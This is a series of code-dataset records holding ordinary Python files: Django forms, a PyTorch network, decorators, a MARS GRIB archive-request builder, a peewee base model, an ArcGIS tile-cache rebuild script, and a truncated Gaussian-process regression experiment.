= forms.CharField(required=False)\n new_video_length = forms.CharField(required=False)\n", "sub_path": "process/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 15, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 15, "usage_type": "call"}, {"api_name": "django.forms.IntegerField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 34, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 48, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 48, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 55, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 55, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 62, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 62, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 76, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 77, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 77, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 77, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 78, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 78, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 78, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "django.forms.ValidationError", "line_number": 87, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 87, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 96, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 99, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 100, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 101, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 101, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 104, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 104, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 105, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 105, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 106, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 106, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 107, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 107, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 108, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "307691743", "text": "import torch\nimport torch.nn as nn\n\nclass ClassicNN(nn.Module):\n \"\"\"1136 100 46\"\"\"\n def __init__(self, d_dim=20499, dim1=1136, dim2=100):\n super(ClassicNN, self).__init__()\n self.dim1 = dim1\n self.dim2 = dim2\n self.d_dim = d_dim\n self.h1 = nn.Sequential(\n nn.Linear(self.d_dim, self.dim1),\n nn.Tanh(),\n )\n self.h2 = nn.Sequential(\n nn.Linear(self.dim1, self.dim2),\n nn.Tanh(),\n )\n self.o = nn.Sequential(\n nn.Linear(self.dim2, 46),\n )\n print(self)\n\n def forward(self, x, target_layer=0):\n h1_output = self.h1(x)\n h2_output = self.h2(h1_output)\n output = self.o(h2_output)\n if target_layer == 1:\n return h1_output\n elif target_layer == 2:\n return h2_output\n else:\n return output", "sub_path": "other_codes/classicNN/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "133641219", "text": "from __future__ import absolute_import\nimport logging\n\nfrom decorators import FuncDecorator\n\nfrom ..exception import CallError\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TargetDecorator(FuncDecorator):\n def normalize_target_params(self, request, controller_args, controller_kwargs):\n return [], dict(\n request=request,\n controller_args=controller_args, \n controller_kwargs=controller_kwargs\n )\n\n def handle_error(self, e):\n raise e\n\n def handle_target(self, request, controller_args, controller_kwargs):\n try:\n param_args, param_kwargs = self.normalize_target_params(\n request=request,\n controller_args=controller_args,\n controller_kwargs=controller_kwargs\n )\n ret = self.target(*param_args, **param_kwargs)\n if not ret:\n raise ValueError(\"{} check failed\".format(self.__class__.__name__))\n\n except CallError:\n raise\n\n except (AttributeError, TypeError) as e:\n logger.debug(e, exc_info=True)\n raise NotImplementedError(e.message)\n\n except Exception as e:\n logger.debug(e, exc_info=True)\n self.handle_error(e)\n\n def decorate(self, func, target, *anoop, **kwnoop):\n if target:\n self.target = target\n\n def decorated(decorated_self, *args, **kwargs):\n self.handle_target(\n request=decorated_self.request,\n controller_args=args,\n controller_kwargs=kwargs\n )\n return func(decorated_self, *args, **kwargs)\n\n return decorated\n\n", "sub_path": "endpoints/decorators/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "decorators.FuncDecorator", "line_number": 12, "usage_type": "name"}, {"api_name": "exception.CallError", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "374863572", "text": "import os\nimport eccodes as ecc\nimport argparse\nimport sys\n\nclass Request(object):\n\n def __init__(self,Action=None,Source=None,Date=None,Hour=None,Origin=None,Type=None,Step=None,Levelist=None,Param=None,Levtype=None,\n Database=\"marsscratch\",Expver=\"prod\",Class=\"RR\",Stream=\"oper\"):\n \"\"\" Construct a request for mars\"\"\"\n self.action = Action\n self.source = Source\n self.database = Database\n self.date = Date\n self.hour = Hour\n self.origin = Origin\n self.type = Type\n self.step = Step if type(Step) == list else [Step]\n self.param = Param if type(Param) == list else [Param]\n self.levelist = Levelist if type(Levelist) == list else [Levelist]\n self.levtype = Levtype\n self.expver = Expver\n self.marsClass = Class\n self.stream = Stream\n self.expect = len(self.step)*len(self.param)*len(self.levelist)\n\n def write_request(self,f):\n separator = '/'\n if self.database:\n f.write('%s,source=%s,database=%s,\\n' % (self.action,self.source,self.database))\n else:\n f.write('%s,source=%s,\\n' % (self.action,self.source))\n f.write(_line('DATE',self.date))\n f.write(_line('TIME',self.hour))\n f.write(_line('ORIGIN',self.origin.upper()))\n f.write(_line('STEP',separator.join(str(x) for x in self.step)))\n if self.levtype.lower() != \"sfc\".lower():\n f.write(_line('LEVELIST',separator.join(str(x) for x in self.levelist)))\n f.write(_line('PARAM',separator.join(str(x) for x in self.param)))\n f.write(_line('EXPVER',self.expver.lower()))\n f.write(_line('CLASS ',self.marsClass.upper()))\n f.write(_line('LEVTYPE',self.levtype.upper()))\n f.write(_line('TYPE',self.type.upper()))\n f.write(_line('STREAM',self.stream.upper()))\n f.write(_line('EXPECT',self.expect,eol=\"\"))\n\n\nclass RequestFromGrib(Request):\n\n def __init__(self,gribfile,Action,Database='marsscratch'):\n super().__init__(Database=Database)\n self.source = gribfile\n self.action = Action\n self.parse_grib_file()\n\n def parse_grib_file(self):\n gribfile = self.source\n self.type,self.date,self.hour,self.levtype,grib2 = os.path.basename(gribfile).split('.')\n\n params = []\n levels = []\n steps = []\n with ecc.GribFile(gribfile) as gf:\n nfields = len(gf)\n for i in range(len(gf)):\n msg = ecc.GribMessage(gf)\n params.append(msg['param'])\n levels.append(msg['level'])\n steps.append(msg['step'])\n if i == 1:\n self.date = str(msg[\"dataDate\"])\n self.hour = \"%04d\" % int(msg[\"dataTime\"])\n\n if str(msg['suiteName']) == '1':\n self.origin = \"no-ar-ce\"\n elif str(msg['suiteName']) == '2':\n self.origin = \"no-ar-cw\"\n elif str(msg['suiteName']) == '3':\n self.origin = \"no-ar-pa\"\n else:\n print(\"unknown origin/suiteName\")\n exit(1)\n\n param = list(set(params))\n param.sort()\n self.param = param\n levelist = list(set(levels))\n levelist.sort()\n levelist.reverse()\n self.levelist = levelist\n step = list(set(steps))\n step.sort()\n self.step = step\n self.expect = nfields\n\n\ndef _line(key,val,eol=','):\n return \" %s= %s%s\\n\" % (key.ljust(11),val,eol)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='dump mars request from input gribfile')\n parser.add_argument('filename',type=str,help='grib file name')\n parser.add_argument('--database',type=str,default='marsscratch',help='mars database')\n\n args = parser.parse_args()\n\n gribfile = args.filename\n \n if args.database == \"mars\":\n database = None\n else:\n database = args.database\n\n with sys.stdout as rf:\n req = RequestFromGrib(gribfile,\"archive\",database)\n req.write_request(rf)\n\nexit()\n", "sub_path": "util/carra_grib2/archive/make_archive_request.py", "file_name": "make_archive_request.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.basename", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "eccodes.GribFile", "line_number": 63, "usage_type": "call"}, {"api_name": "eccodes.GribMessage", "line_number": 66, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}]} +{"seq_id": "71247957", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dataclay/serialization/python/lang/DCIDWrapper.py\n# Compiled at: 2019-10-28 11:50:26\n# Size of source mod 2**32: 1044 bytes\n\"\"\" Class description goes here. \"\"\"\nimport uuid\nimport dataclay.serialization.python.DataClayPythonWrapper as DataClayPythonWrapper\nimport dataclay.serialization.python.lang.BooleanWrapper as BooleanWrapper\n__author__ = 'Alex Barcelo '\n__copyright__ = '2015 Barcelona Supercomputing Center (BSC-CNS)'\n\nclass DCIDWrapper(DataClayPythonWrapper):\n __doc__ = 'dataClay UUID (straightforward serialization).'\n __slots__ = ('_nullable', )\n\n def __init__(self, nullable=False):\n self._nullable = nullable\n\n def read(self, io_file):\n if self._nullable:\n present = BooleanWrapper().read(io_file)\n if not present:\n return\n return uuid.UUID(bytes=(str(io_file.read(16))))\n\n def write(self, io_file, value):\n if self._nullable:\n if value is None:\n BooleanWrapper().write(io_file, False)\n return\n BooleanWrapper().write(io_file, True)\n io_file.write(value.get_bytes())", "sub_path": "pycfiles/dataClay-2.1-py3.7/DCIDWrapper.cpython-37.py", "file_name": "DCIDWrapper.cpython-37.py", "file_ext": "py", "file_size_in_byte": 1327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dataclay.serialization.python.DataClayPythonWrapper", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 24, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 27, "usage_type": "call"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 32, "usage_type": "call"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "167398375", "text": "import logging\nimport json\nimport datetime\n\nfrom src.database import database\nfrom peewee import *\n\n\nclass Serializer(object):\n\n def convert_value(self, value):\n is1 = isinstance(value, datetime.datetime)\n is2 = isinstance(value, datetime.date)\n is3 = isinstance(value, datetime.time)\n\n if is1 or is2 or is3:\n return Serializer.datetime(value)\n elif isinstance(value, Model):\n return value.get_id()\n else:\n return value\n\n def clean_data(self, data):\n for key, value in data.items():\n if isinstance(value, dict):\n self.clean_data(value)\n elif isinstance(value, (list, tuple)):\n data[key] = map(self.clean_data, value)\n else:\n data[key] = self.convert_value(value)\n return data\n\n def serialize_object(self, obj, fields=None, exclude=None):\n data = BaseModel.get_dictionary_from_model(obj, fields, exclude)\n return self.clean_data(data)\n\n @staticmethod\n def datetime(obj):\n \"\"\"Default JSON serializer.\"\"\"\n import calendar\n from datetime import date, datetime\n\n if isinstance(obj, datetime):\n if obj.utcoffset() is not None:\n obj = obj - obj.utcoffset()\n\n elif isinstance(obj, date):\n obj = datetime.combine(obj, datetime.min.time())\n\n return int(calendar.timegm(obj.timetuple()))\n\n\nclass Deserializer(object):\n def deserialize_object(self, model, data):\n return BaseModel.get_model_from_dictionary(model, data)\n\n\nclass BaseModel(Model, Serializer, Deserializer):\n created_at = DateTimeField(default=datetime.datetime.now)\n modified_at = DateTimeField(default=datetime.datetime.now)\n deleted = BooleanField(default=False)\n\n class Meta:\n database = database\n\n @classmethod\n def fetch(cls, *selection):\n return cls.select(*selection).where(cls.deleted == False)\n\n def save(self, *args, **kwargs):\n self.modified_at = datetime.datetime.now()\n return super(BaseModel, self).save(*args, **kwargs)\n\n @classmethod\n def delete(cls, permanently=False):\n if permanently:\n return super(BaseModel, cls).delete()\n else:\n return super(BaseModel, cls).update(deleted=True, modified_at=datetime.datetime.now())\n\n @classmethod\n def update(cls, **update):\n update[\"modified_at\"] = datetime.datetime.now()\n return super(BaseModel, cls).update(**update)\n\n def delete_instance(self, permanently=False, recursive=False, delete_nullable=False):\n\n if permanently:\n return self.delete(permanently).where(self.pk_expr()).execute()\n else:\n self.deleted = True\n return self.save()\n\n def to_json(self):\n return json.dumps(self, default=self.serialize_object)\n\n def __str__(self):\n return self.get_dictionary()\n\n def get_dictionary(self, fields=None, exclude=None):\n return BaseModel.get_dictionary_from_model(self, fields, exclude)\n\n @staticmethod\n def get_dictionary_from_model(model, fields=None, exclude=None):\n model_class = type(model)\n data = {}\n\n fields = fields or {}\n exclude = exclude or {}\n curr_exclude = exclude.get(model_class, [])\n curr_fields = fields.get(model_class, model._meta.get_field_names())\n\n for field_name in curr_fields:\n if field_name in curr_exclude:\n continue\n\n field_obj = model_class._meta.fields[field_name]\n field_data = model._data.get(field_name)\n if isinstance(field_obj, ForeignKeyField) and field_data and field_obj.rel_model in fields:\n rel_obj = getattr(model, field_name)\n data[field_name] = BaseModel.get_dictionary_from_model(rel_obj, fields, exclude)\n else:\n data[field_name] = field_data\n\n return data\n\n @staticmethod\n def get_model_from_dictionary(model, field_dict):\n if isinstance(model, Model):\n model_instance = model\n check_fks = True\n else:\n model_instance = model()\n check_fks = False\n models = [model_instance]\n for field_name, value in field_dict.items():\n field_obj = model._meta.fields[field_name]\n if isinstance(value, dict):\n rel_obj = field_obj.rel_model\n if check_fks:\n try:\n rel_obj = getattr(model, field_name)\n except field_obj.rel_model.DoesNotExist:\n pass\n if rel_obj is None:\n rel_obj = field_obj.rel_model\n rel_inst, rel_models = BaseModel.get_model_from_dictionary(rel_obj, value)\n models.extend(rel_models)\n setattr(model_instance, field_name, rel_inst)\n else:\n setattr(model_instance, field_name, field_obj.python_value(value))\n return model_instance, models\n\n @staticmethod\n def get_object_id(obj):\n if isinstance(obj, BaseModel):\n return obj.id\n elif isinstance(obj, int):\n return obj\n else:\n try:\n return int(obj)\n except (TypeError, ValueError):\n return None\n\n\nclass JsonField(TextField):\n def db_value(self, value):\n return json.dumps(value, default=Serializer.datetime)\n\n def python_value(self, value):\n try:\n return json.loads(value)\n except ValueError as e:\n logging.error(\"Failed to encode JSON: %s\" % e.message)\n return dict()\n\n\nclass EnumField(TextField):\n\n def values(self, values):\n self.values = values\n return self\n\n def db_value(self, value):\n if value in self.values:\n return value\n else:\n return self.default\n", "sub_path": "backend/src/models/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5971, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.datetime.combine", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.min.time", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime.min", "line_number": 48, "usage_type": "attribute"}, {"api_name": "calendar.timegm", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "attribute"}, {"api_name": "src.database.database", "line_number": 64, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 95, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 169, "usage_type": "call"}, {"api_name": "{'calendar': 'calendar', 'date': 'datetime.date', 'datetime': 'datetime.datetime'}.datetime", "line_number": 169, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "134189134", "text": "#---------------------------------------------------------------------------------------------------------------\n# Name: Rebuild Cached Map Service Tiles in Updated Areas\n#\n# Purpose: Rebuilds tiles for a cached map service in areas that have been updated in a reference layer within a time period specified relative to the day the script runs.\n#\n# Author: Patrick McKinney\n#\n# Created: 9/2/2020\n#\n# Copyright: (c) Cumberland County 2020\n#\n# Disclaimer: CUMBERLAND COUNTY ASSUMES NO LIABILITY ARISING FROM USE OF THESE MAPS OR DATA. THE MAPS AND DATA ARE PROVIDED WITHOUT\n# WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\n# FITNESS FOR A PARTICULAR PURPOSE.\n# Furthermore, Cumberland County assumes no liability for any errors, omissions, or inaccuracies in the information provided regardless\n# of the cause of such, or for any decision made, action taken, or action not taken by the user in reliance upon any maps or data provided\n# herein. The user assumes the risk that the information may not be accurate.\n#-------------------------------------------------------------------------------------------------------------------\n\n# Import system modules\nimport arcpy, sys, time, datetime\n\ntry:\n # get timestamp for starting processing\n start_time = time.perf_counter()\n\n # Name of service\n service_name = 'Name of Service'\n\n # date for the day the script is run on\n date_today = datetime.date.today()\n # Date formatted as month-day-year (1-1-2017)\n formatted_date_today = date_today.strftime('%m-%d-%Y')\n # date for how many days back you want to check for changes in a dataset\n # change 8 to how many days back you want to check for changes\n date_ago = date_today - datetime.timedelta(days=8)\n\n # variable to store messages for log file. Messages written in finally statement at end of script\n log_message = ''\n # Create text file for logging results of script\n log_file = r'C:\\GIS\\Logs\\Rebuild Map Tiles Report {}.txt'.format(formatted_date_today)\n\n # layer you want to check for changes in\n # there needs to be a Date field that captures when edits occur\n # ideally this would be an Editor Tracking field\n # see https://pro.arcgis.com/en/pro-app/tool-reference/data-management/enable-editor-tracking.htm\n reference_layer = r'C:\\GIS\\Data\\reference_layer.shp'\n # make feature layer so you can use the select by attributes function\n ref_lyr_file = arcpy.MakeFeatureLayer_management(reference_layer, 'My_Layer')\n\n # SQL query clause\n # the format for queries using date fields changes based upon your data's format\n # read the docs > https://pro.arcgis.com/en/pro-app/help/mapping/navigation/sql-reference-for-elements-used-in-query-expressions.htm\n # replace \"last_edited_date\" with whatever field represents the date last modiefied\n where_clause = \"\"\"last_edited_date >= date '{}' AND last_edited_date <= date '{}'\"\"\".format(date_ago, date_today)\n\n # select features from reference layer that have been modified within your specified date range (i.e., within last week)\n arcpy.SelectLayerByAttribute_management(ref_lyr_file, 'NEW_SELECTION', where_clause)\n\n # get count of features\n count_selected_reference = arcpy.GetCount_management(tax_parcels_lyr)[0]\n # verify records have been selected; if not, add message and exit script\n if count_selected_reference == 0:\n # add message\n log_message += 'No \"Reference Layer\" records have been modified between {} and {}\\n'.format(date_ago, date_today)\n # exit\n sys.exit()\n\n # grid layer that covers your area of interest (city, county, state, etc)\n cache_grid_tiles = r'C:\\GIS\\Data\\grids_layer.shp'\n # make feature layer so you can select by location\n cache_grid_tiles_lyr = arcpy.MakeFeatureLayer_management(cache_grid_tiles, 'Grid_Tiles')\n\n # select tile grids that intersect selected records from reference layer\n arcpy.SelectLayerByLocation_management(cache_grid_tiles_lyr, 'INTERSECT', ref_lyr_file)\n\n # get count of features\n count_selected_grids = arcpy.GetCount_management(cache_grid_tiles_lyr)[0]\n # verify records have been selected; if not, add message and exit script\n if count_selected_grids == 0:\n # add message\n log_message += 'No \"Grid\" features intersect \"Reference Layer\" records that have been modified between {} and {}\\n'.format(date_ago, date_today)\n # exit\n sys.exit()\n\n # use selected records from grid tiles as area of interest for rebuilding cached map service tiles\n area_of_interest_lyr = r'memory\\selected_grids'\n # copy selected features from grid layer to in memory\n arcpy.CopyFeatures_management(cache_grid_tiles_lyr, area_of_interest_lyr)\n\n # add message\n log_message += 'Added selected \"Grid\" features to {}\\n'.format(area_of_interest_lyr)\n log_message += '\\nSelected grids:\\n\\n'\n\n # loop through Grid layer and list what records have been selected\n # you can then use these as areas to check to verify your tiles have rebuilt the data\n # replace 'LabelField' with a field in your Grid layer\n with arcpy.da.SearchCursor(area_of_interest_lyr, 'LabelField') as cursor:\n for row in cursor:\n log_message += '\\t{}\\n'.format(row[0])\n\n # create feature set object\n # see https://pro.arcgis.com/en/pro-app/arcpy/classes/featureset.htm\n feature_set = arcpy.FeatureSet()\n # load selected records from Grid layer into feature set\n feature_set.load(area_of_interest_lyr)\n\n # sign-in to Portal or ArcGIS Online\n arcpy.SignInToPortal('Portal or ArcGIS Online URL', 'user name', 'password')\n\n # geoprocessing - rebuild map service cache tiles\n # see https://pro.arcgis.com/en/pro-app/tool-reference/server/manage-map-server-cache-tiles.htm\n # manually rebuilding the tiles for the service and copying the geoprocessing tool as a Python snippet\n # can be used to get set this function\n arcpy.server.ManageMapServerCacheTiles('service url', ['scales to rebuild'], 'RECREATE_ALL_TILES', -1, feature_set, wait_for_job_completion='WAIT')\n\n # get time stamp for end of processing\n finish_time = time.perf_counter()\n # time of processing in seconds\n elapsed_time = finish_time - start_time\n # time in minutes\n elapsed_time_minutes = round((elapsed_time / 60), 2)\n # time in hours\n elapsed_time_hours = round((elapsed_time_minutes / 60), 2)\n\n log_message += '\\n\\nRebuilt cached tiles for {} in {}-hours on {}\\n'.format(service_name, elapsed_time_hours, formatted_date_today)\n# If an error occurs running geoprocessing tool(s) capture error and write message\n# handle error outside of Python system\nexcept EnvironmentError as e:\n tbE = sys.exc_info()[2]\n # Write the line number the error occured to the log file\n log_message += '\\nFailed at Line {}\\n'.format(tbE.tb_lineno)\n # Write the error message to the log file\n log_message += 'Error: {}'.format(str(e))\n# handle exception error\nexcept Exception as e:\n # Store information about the error\n tbE = sys.exc_info()[2]\n # Write the line number the error occured to the log file\n log_message += '\\nFailed at Line {}\\n'.format(tbE.tb_lineno)\n # Write the error message to the log file\n log_message += 'Error: {}'.format(e)\nfinally:\n # write message to log file\n try:\n with open(log_file, 'w') as f:\n f.write(str(log_message))\n except:\n pass", "sub_path": "rebuild_map_service_tiles_in_updated_areas.py", "file_name": "rebuild_map_service_tiles_in_updated_areas.py", "file_ext": "py", "file_size_in_byte": 7511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.perf_counter", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "arcpy.MakeFeatureLayer_management", "line_number": 49, "usage_type": "call"}, {"api_name": "arcpy.SelectLayerByAttribute_management", "line_number": 58, "usage_type": "call"}, {"api_name": "arcpy.GetCount_management", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 67, "usage_type": "call"}, {"api_name": "arcpy.MakeFeatureLayer_management", "line_number": 72, "usage_type": "call"}, {"api_name": "arcpy.SelectLayerByLocation_management", "line_number": 75, "usage_type": "call"}, {"api_name": "arcpy.GetCount_management", "line_number": 78, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "arcpy.CopyFeatures_management", "line_number": 89, "usage_type": "call"}, {"api_name": "arcpy.da.SearchCursor", "line_number": 98, "usage_type": "call"}, {"api_name": "arcpy.da", "line_number": 98, "usage_type": "attribute"}, {"api_name": "arcpy.FeatureSet", "line_number": 104, "usage_type": "call"}, {"api_name": "arcpy.SignInToPortal", "line_number": 109, "usage_type": "call"}, {"api_name": "arcpy.server.ManageMapServerCacheTiles", "line_number": 115, "usage_type": "call"}, {"api_name": "arcpy.server", "line_number": 115, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 130, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "365768088", "text": "from sklearn.datasets import load_boston\nimport pandas as pd\nfrom GPy.models import GPRegression\nfrom GPy.kern import RBF\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.svm import SVR\nimport lightgbm as lgb\nimport numpy as np\nimport random\nfrom coding.ABO.AGPR import A_GPR\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings('ignore')\na_gpr = A_GPR()\n\ndata = pd.read_excel('../../dataset/cccp_data.xlsx')\n# ['AT', 'V', 'AP', 'RH', 'PE']\nx_data = data[['AT', 'V', 'AP', 'RH']].values\ny_data = data[['PE']].values\n\n# for index in range(np.shape(x_data)[0]):\n# scaler = StandardScaler()\n# x_data[index] = scaler.fit_transform(np.array(x_data[index])[0].reshape(-1, 1))\n#\nx_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=0.2)\n\nm, n = np.shape(x_train)\nprint('训练数据总量', m)\n\n_, x_train_l, _, y_train_l = train_test_split(x_train, y_train, test_size=60/m)\n\n# x_train_l, y_train_l = a_gpr.sample_point(x_train, y_train, iter=100)\n\nprint('低似真度数据样本量:', np.shape(x_train_l)[0])\n\n# 为 low fidelity 数据添加噪声\nmu = 0\nsigma = 30\nfor i in range(np.shape(x_train_l)[0]):\n y_train_l[i] = y_train_l[i] + random.gauss(0, sigma)\n # y_train_l[i] = y_train_l[i] * 1.1 - 10\n\nx_train_l = np.array(x_train_l, ndmin=2)\ny_train_l = np.reshape(y_train_l, (-1, 1))\n\nlist_mean_mse_gpr = []\nlist_mean_mse_lgb = []\nlist_mean_mse_svr = []\n\nlist_average = []\nplt.figure(figsize=(10, 5))\nax_1 = plt.subplot(121)\nax_2 = 